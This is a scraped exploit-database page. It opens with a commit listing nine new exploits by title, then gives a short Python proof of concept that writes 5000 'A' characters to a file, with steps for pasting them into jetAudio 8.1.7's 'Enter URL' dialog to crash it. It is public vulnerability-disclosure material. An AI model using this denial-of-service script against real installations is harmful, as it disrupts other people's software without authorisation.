5a4d21a1cf
9 changes to exploits/shellcodes jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC) MiniFtp - 'parseconf_load_setting' Buffer Overflow Lotus Domino 8.5.3 - 'EXAMINE' Stack Buffer Overflow DEP/ASLR Bypass (NSA's EMPHASISMINE) Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit) PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit) Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit) NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass Linux/x86 - execve /bin/sh Shellcode (20 bytes)
21 lines
No EOL
702 B
Python
Executable file
21 lines
No EOL
702 B
Python
Executable file
#Exploit Title: jetAudio 8.1.7.20702 Basic - Denial of Service (PoC)
|
|
#Discovery by: Victor Mondragón
|
|
#Discovery Date: 2019-05-07
|
|
#Vendor Homepage: http://www.jetaudio.com/
|
|
#Software Link: http://www.jetaudio.com/download/
|
|
#Tested Version: 8.1.7.20702
|
|
#Tested on: Windows 7 Service Pack 1 x64 / Windows 10 Single Language x64
|
|
|
|
#Steps to produce the crash:
|
|
#1.- Run python code: jetAudio_8.1.7.20702.py
|
|
#2.- Open jetAudio.txt and copy content to clipboard
|
|
#2.- Open jetAudio
|
|
#3.- Select Menu > Basic Controls > Open URL...
|
|
#4.- In "Enter URL" Paste ClipBoard after "http://"
|
|
#5.- Click on "Ok"
|
|
#6.- Crashed
|
|
|
|
cod = "\x41" * 5000
|
|
f = open('jetAudio.txt', 'w')
|
|
f.write(cod)
|
|
f.close() |